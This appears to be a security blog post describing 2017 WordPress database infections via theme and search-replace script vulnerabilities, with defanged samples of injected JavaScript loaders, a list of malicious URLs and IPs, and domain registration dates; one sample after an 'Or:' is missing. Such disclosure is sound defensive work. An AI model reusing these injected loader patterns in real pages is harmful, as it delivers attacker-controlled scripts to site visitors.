Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data
Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php).
The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks.
Typical injected scripts look like this:
<s cript type='text/javascript' src='hxxps://con1.sometimesfree[.]biz/c.js’>
Or:
var t = document.createElement(“script”);
t.type = “text/javascript”; t.src = “hxxps://src[.]dancewithme[.]biz/src.js“;
document.head.appendChild(t);
Or:
The most noticeable malicious URLs that we’ve seen lately are:
- con1.sometimesfree[.]biz/c.js (185.82.217.166 Bulgaria)
- java.sometimesfree[.]biz/counter.js (185.82.217.166 Bulgaria)
- javascript.sometimesfree[.]biz/script.js (185.82.217.166 Bulgaria)
- js.givemealetter[.]biz/script.js (185.82.217.166 Bulgaria)
- go.givemealetter[.]biz/click.html (185.82.217.166 Bulgaria)
- traffictrade[.]life/scripts.js (200.7.105.43 United Kingdom)
- blue.traffictrade[.]life/main.js (200.7.105.43 United Kingdom)
- js.trysomethingnew[.]eu/analytics.js (94.156.144.19 Bulgaria)
- get.simplefunsite[.]info/rw.js (won’t resolve atm)
- post.simplefunsite[.]info/go.php?rewrite=81 (won’t resolve atm)
- src.dancewithme[.]biz/src.js (185.159.82.2 – Russia)
- go.dancewithme[.]biz/red.php (185.159.82.2 – Russia)
They are all new domains registered specifically for this attack:
- traffictrade[.]life – created on July 3rd, 2017
- trysomethingnew[.]eu – created on Aug 11th, 2017
- sometimesfree[.]biz – created on August 22nd, 2017
- givemealetter[.]biz – created on August 27th, 2017
- simplefunsite.info – created on September 2nd, 2017
- dancewithme[.]biz – created on September 5th, 2017
Malware in WordPress Database
In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely not a task you want to do manually!
No comments yet.